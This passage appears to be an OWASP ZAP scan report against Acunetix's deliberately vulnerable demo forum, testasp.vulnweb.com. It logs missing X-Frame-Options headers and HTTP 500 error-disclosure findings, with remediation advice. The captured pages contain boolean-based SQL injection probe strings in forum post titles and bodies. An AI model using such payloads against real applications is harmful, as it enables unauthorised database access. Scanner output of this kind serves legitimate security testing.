<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=82 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=82 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3086 |
Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3*2<(0+5+332-332) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=83 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 2779 |
Response Body - size: 2,779 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3131 |
Response Body - size: 3,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
Instances | 365 |
Solution |
Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app.
If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
|
Reference | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options |
Tags |
OWASP_2021_A05
WSTG-v42-CLNT-09 OWASP_2017_A06 |
CWE Id | 1021 |
WASC Id | 15 |
Plugin Id | 10020 |
Low |
Application Error Disclosure |
---|---|
Description |
This page contains an error/warning message that may disclose sensitive information like the location of the file that produced the unhandled exception. This information can be used to launch further attacks against the web application. The alert could be a false positive if the error message is found inside a documentation page.
|
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 453 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 481 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
